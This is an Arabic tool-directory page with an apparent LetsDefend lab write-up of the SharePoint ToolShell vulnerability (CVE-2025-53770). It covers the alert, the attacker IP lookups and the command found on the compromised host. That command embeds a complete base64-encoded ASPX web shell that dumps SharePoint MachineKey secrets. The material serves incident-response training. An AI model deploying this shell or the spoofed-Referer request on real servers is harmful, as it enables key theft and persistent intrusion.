Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend — شرح خطوة بخطوة لاستغلال CVE-2025-53770 (ToolShell) في مختبر LetsDefend، يغطي RCE ونشر شيل الويب وتحليل الاستجابة للحوادث. | Kitploit
أدوات/GitHubGitHub/cyprianatsyor/toolshell-cve-2025-53770-sharepoint-exploit-lab-letsdefend
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتحليل البرمجيات الخبيثةالتحاليل الرقمية الجنائيةCTFاختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
الاستجابة للحوادث
تطوير الحمولات
مختبرات وتدريب عملي
GitHubcyprianatsyor/toolshell-cve-2025-53770-sharepoint-exploit-lab-letsdefend

ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend

شرح خطوة بخطوة لاستغلال CVE-2025-53770 (ToolShell) في مختبر LetsDefend، يغطي RCE ونشر شيل الويب وتحليل الاستجابة للحوادث.

عرض المستودع
18منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend

TL;DR مرحبًا، في هذا المختبر من LetsDefend تعمّقت في ثغرة يوم-الصفر الخاصة بـ SharePoint والتي تُسمى ToolShell (CVE-2025-53770). ببساطة، حاكيت هجومًا واقعيًا حيث تجاوز طلب POST خبيث المصادقة، ونفّذ PowerShell لسرقة مفاتيح MachineKeySection، وترجَم payload.exe، وأسقط ويب شيل (spinstall0.aspx). سجّلت كل شيء، وحللت السلوك، واحتوت المضيف. يغطي هذا الملف الهجوم وخطواتي والدروس المستفادة.

نظرة عامة على المختبر

  • المنصة: LetsDefend Cyber Range
  • الجهاز المستهدف: خادم SharePoint (SharePoint01)
  • CVE: CVE-2025-53770
  • الهدف: تحليل RCE، وممارسة الاكتشاف والاحتواء

الأدوات المستخدمة:

Windows PowerShell

VirusTotal

AbuseIPDB

LetsDefend Log Management

LetsDefend Endpoint Security

LetsDefend Threat Intel


Alert Image Detail

Alert Image Detail

معرّف الحدث : 320

وقت الحدث : 22 يوليو 2025، 01:07 مساءً

القاعدة : SOC342 - CVE‑2025‑53770 SharePoint ToolShell Auth Bypass and RCE

المستوى : محلل أمني

اسم المضيف : SharePoint01

عنوان IP المصدر : 107.191.58.76

عنوان IP الوجهة : 172.16.20.17

طريقة طلب HTTP : POST

عنوان URL المطلوب : /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx

وكيل المستخدم : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0

المرجع (Referer) : /_layouts/SignOut.aspx

طول المحتوى : 7699

سبب إطلاق التنبيه : طلب POST غير موثَّق ومريب يستهدف ToolPane.aspx بحجم حمولة كبير ومرجع Referer مزوَّر، مما يشير إلى استغلال CVE-2025-53770.

إجراء الجهاز : مسموح



نظرة عامة

في 22 يوليو 2025، رصدت أنظمة المراقبة الأمنية لدينا هجومًا حرجًا من نوع يوم-الصفر يستهدف خادم SharePoint محليًا باسم SharePoint01.

تفاصيل CVE:

  • CVE ID: CVE-2025-53770
  • درجة الخطورة: حرجة (CVSS 9.8)
  • نوع الاستغلال: تنفيذ تعليمات برمجية عن بُعد (RCE) عبر ثغرة إلغاء التسلسل (Deserialization)
  • الإفصاح: معروف علنًا منذ 19 يوليو 2025
  • إصدار التصحيح: 20–21 يوليو 2025

كتالوج CISA KEV: نُشر الإدخال في 20 يوليو 2025

متجه الهجوم: طلب POST إلى نقطة النهاية /ToolPane.aspx، مع ترويسة Referer مزوّفة وحمولة خبيثة كبيرة

المصدر: عنوان IP 107.191.58.76، Vultr Holdings, LLC، الولايات المتحدة


حول SharePoint

مايكروسوفت SharePoint هو العمود الفقري للتعاون المؤسسي وإدارة المستندات. إنه في الأساس مساحة آمنة ومنظمة تشبه السحابة للملفات وسير العمل والتطبيقات الداخلية.

الاستخدامات الأساسية:

  • إدارة المستندات: التحكم في الإصدارات، سجلات التدقيق، التحكم في الملفات

  • التعاون: تحرير عدة مستخدمين للمستند نفسه في الوقت نفسه

  • بوابات الويب الداخلية: الأخبار والتحديثات ومعلومات الموارد البشرية والسياسات

  • سير العمل الآلي: الموافقات والنماذج والإشعارات

  • التكامل: مرتبط ارتباطًا وثيقًا بـ Teams وOutlook وحزمة Office وPower BI

الاعتبارات الأمنية:

  • المصادقة: AD أو SSO

  • التشفير: البيانات المخزنة وأثناء النقل

  • أجزاء الويب والتخطيطات: يمكن استغلالها إذا أُسيء ضبط إعداداتها

  • إدارة التصحيحات: أمر بالغ الأهمية لمنع هجمات يوم-الصفر


ما هي CVE-2025-53770؟---

CVE-2025-53770 وتُسمى أيضًا ToolShell، هي ثغرة يوم-الصفر في SharePoint تُستغل في البيئات الحقيقية. إنها ثغرة حرجة في إلغاء التسلسل (Deserialization) في خوادم Microsoft SharePoint المحلية تتيح تنفيذ تعليمات برمجية عن بُعد (RCE) دون مصادقة. تتقاطع مع ثغرات أخرى في SharePoint (CVE-2025-49704 وCVE-2025-49706) لاختراق الأنظمة بالكامل. حصلت على درجة CVSS تبلغ 9.8، ما يعني أنها حرجة.

ماذا يفعل المهاجمون؟---

يرفعون ويب شيل خبيث مثل spinstall0.aspx عبر نقطة النهاية ToolPane.aspx باستخدام ترويسات Referer مزوّفة لتجاوز المصادقة.

يستخرجون قيم MachineKey الحساسة من إعدادات SharePoint لإنشاء حمولات ViewState موثوقة لضمان وصول مستمر.

ولاحقًا ينشرون برمجيات الفدية (مثل سلالة "Warlock") أو يسرقون بيانات الاعتماد ويثبّتون أبوابًا خلفية.

أول إفصاح علني: 19 يوليو 2025 (مدونة Microsoft)

صدرت التصحيحات: 20–21 يوليو 2025

أُدرج في كتالوج KEV التابع لـ CISA: 20 يوليو 2025


تحليل الهجوم

حللت عنوان IP الخاص بالمرسل (عنوان IP المصدر) على VirusTotal

عنوان IP المصدر : 107.191.58.76

Result form VirusTotal

من هذا أعرف مسبقًا أن عنوان الـ IP خبيث

الآن يجب أن أبحث عن موقع مصدر عنوان الـ IP بمساعدة AbuseIPDB

AbuseIPDB

هذا ما حصلت عليه:

مزود خدمة الإنترنت Vultr Holdings, LLC

نوع الاستخدام مركز بيانات/استضافة ويب/عبور

ASN AS20473

اسم المضيف (المضيفات) 107.191.58.76.vultrusercontent.com

اسم النطاق vultr.com

الدولة الولايات المتحدة الأمريكية

المدينة لوس أنجلوس، كاليفورنيا

عنوان IP معروف بالاختراق، وهجمات القوة الغاشمة، وهجمات تطبيقات الويب، وفحص المنافذ، وتسميم DNS


كمحلل مبتدئ يحل هذه الحالة كيف تعاملت معها أولًا بحثت عن المضيف في أمان نقاط النهاية (Endpoint Security) بالاسم "SharePoint01".

Endpoint Security

بعد تحديد موقع المضيف، ذهبت إلى سجل الأوامر في الطرفية (Terminal History)، فوجدت سطر أوامر

Command Line Code

ماذا يحدث في هذا الأمر؟

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" → يشغّل PowerShell مباشرة من مجلد النظام.

-nop

→ بدون ملف تعريف (No Profile) — يتجاهل سكربتات ملف تعريف PowerShell لتجنب الاكتشاف أو التداخل.

-w hidden

→ يعمل بنافذة مخفية بحيث لا يراها المستخدم.

-e

لنفكّ تشفير هذا

"PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg=="

الخطوة 1: الاستطلاع والتقاط الحمولة

تنزيل الأداة